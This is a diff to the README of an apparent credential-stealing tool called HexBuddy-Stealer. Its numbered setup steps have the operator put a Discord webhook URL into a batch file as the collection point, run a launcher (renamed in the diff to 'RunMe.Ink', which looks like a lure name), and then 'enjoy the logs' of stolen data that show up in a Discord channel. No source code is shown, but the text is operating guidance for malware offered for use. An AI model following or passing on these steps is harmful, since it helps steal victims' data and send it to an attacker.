255815/HexBuddy-Stealer/README.md

 ![image](https://user-images.githubusercontent.com/82332026/194541917-7ebc027e-5f5e-420a-ac74-93d5676ff74c.png)

-4. Go To /Bin/cs.bat file in the Downloaded Folder in HexBuddyStealer and open in Notepad
+4. Go To /Bin/c2.bat file in the Downloaded Folder in HexBuddyStealer and open in Notepad
 5. Edit The "set "Webtoken=https://discord.com/api/webhooks/your_webhook_here" "
-6. Run The "launch.bat" and wait for 13 seconds
+6. Run The "RunMe.Ink" and wait for 13 seconds
 7. Then Look At The General Channel On Discord ....
 You will Already Recieve Notifactions In The Channel
 8. Enjoy The Logs <3